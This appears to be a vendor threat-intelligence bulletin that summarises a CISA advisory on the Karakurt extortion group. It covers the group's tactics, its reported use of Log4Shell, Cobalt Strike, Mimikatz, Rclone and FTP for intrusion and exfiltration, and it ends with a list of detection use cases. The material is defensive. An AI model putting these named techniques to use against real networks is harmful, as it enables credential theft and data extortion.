CISA Warns of Data Extortion Group Karakurt

Industry: N/A | Level: Tactical | Source: CISA

The Cybersecurity & Infrastructure Security Agency (CISA) latest advisory shared information of the data extortion group, Karakurt. Victims of the threat group have not reported any encryption impact; rather, the group's operations focus on data exfiltration and extortion. Victims from all industries appear to be in scope for the threat group. Karakurt has contacted victim employees, business partners, and clients in order to pressure and embarrass the victim organization into meeting ransom demands. If demands are met, the extortion group provides proof the stolen data was deleted and in addition, an explanation is provided to the victim for how the intrusion was achieved. Victims of Karakurt group have also reported the threat actors dealing in bad faith, "Although Karakurt’s primary extortion leverage is a promise to delete stolen data and keep the incident confidential, some victims reported Karakurt actors did not maintain the confidentiality of victim information after a ransom was paid." The website operated by Karakurt is hidden on the dark web and as of May 2022, contains "several terabytes of data," and identified victims in North America and Europe. Karakurt often purchases credentials for initial access, along with the exploitation of some common vulnerabilities such as Log4Shell have been observed. Some known technical details of the group's attack behavior have identified the usage of Cobalt Strike to enumerate through the network and Mimikatz utilized for credential access. Data of interest is collected and compressed often with 7zip and exfiltrated through FTP, Rclone, or MEGA. The volume of data stolen by Karakurt has also been found to be exaggerated by the threat group with data claimed by the group to exceed the victim's storage capability and/or having data that "did not belong to the victim." The United States federal agencies "strongly discourage" affected organizations from fulfilling ransom demands with Karakurt.

Anvilogic Use Cases:

• Potential CVE-2021-44228 - Log4Shell
• Suspicious Email Attachment
• Executable Create Script Process
• Mimikatz
• Cobalt Strike Beacon
• Utility Archive Data
• Native Archive Commands
• Windows FTP Exfiltration
• Rclone Execution
• Large Data Transfer Proxy